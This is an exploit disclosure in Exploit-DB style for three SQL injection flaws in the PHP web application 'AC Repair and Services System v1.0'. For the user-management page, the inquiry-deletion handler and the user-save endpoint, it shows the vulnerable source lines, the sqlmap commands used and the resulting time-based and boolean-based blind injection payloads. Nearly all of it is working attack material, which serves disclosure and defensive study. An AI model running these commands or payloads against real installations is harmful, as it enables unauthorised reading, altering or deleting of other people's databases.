AC Repair and Services System v1.0 - Multiple SQL Injection

# Exploit Title: AC Repair and Services System v1.0 - Multiple SQL Injection
# Date: 27 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-acrss.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

Source Code(/php-acrss/admin/user/manage_user.php):

<?php 
if(isset($_GET['id'])){
    $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
    foreach($user->fetch_array() as $k =>$v){
        $meta[$k] = $v;
    }
}
?>

-> sqlmap -u "http://localhost/php-acrss/admin/?page=user/manage_user&id=" --batch
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=user/manage_user&id=' AND (SELECT 5500 FROM (SELECT(SLEEP(5)))hiCZ) AND 'rZIs'='rZIs
---

Source Code(/php-acrss/classes/Master.php):

function delete_inquiry(){
		extract($_POST);
		$del = $this->conn->query("DELETE FROM `inquiry_list` where id = '{$id}'");
		if($del){
			$resp['status'] = 'success';
			$this->settings->set_flashdata('success'," Inquiry successfully deleted.");
		}else{
			$resp['status'] = 'failed';
			$resp['error'] = $this->conn->error;
		}
		return json_encode($resp);

	}

-> sqlmap -u "http://localhost/php-acrss/classes/Master.php?f=delete_inquiry" --data="id=*" --batch
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=' AND (SELECT 7930 FROM (SELECT(SLEEP(5)))XwlG) AND 'Jimw'='Jimw
---

Source Code(/php-acrss/classes/Users.php):

$qry = $this->conn->query("UPDATE users set $data where id = {$id}");
			if($qry){
				$this->settings->set_flashdata('success','User Details successfully updated.');
				foreach($_POST as $k => $v){
					if($k != 'id'){
						if(!empty($data)) $data .=" , ";
						if($this->settings->userdata('id') == $id)
							$this->settings->set_userdata($k,$v);
					}
				}

POST /php-acrss/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 943
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAUtgvsSwiJifz27g
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-acrss/admin/?page=user/manage_user&id=9
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=o92n8nati3696kg69plidv5e77
Connection: close

------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="id"

9
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="firstname"

Claire
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="middlename"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="lastname"

Blake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="username"

cblake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryAUtgvsSwiJifz27g--

-> sqlmap -r ~/Documents/POST-localhost.txt --batch

---
Parameter: MULTIPART id ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="id"

(SELECT (CASE WHEN (3947=3947) THEN 9 ELSE (SELECT 2252 UNION SELECT 2638) END))
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="firstname"

Claire
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="middlename"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="lastname"

Blake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="username"

cblake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryAUtgvsSwiJifz27g--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="id"

9 AND (SELECT 7168 FROM (SELECT(SLEEP(5)))pifO)
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="firstname"

Claire
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="middlename"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="lastname"

Blake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="username"

cblake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryAUtgvsSwiJifz27g--
---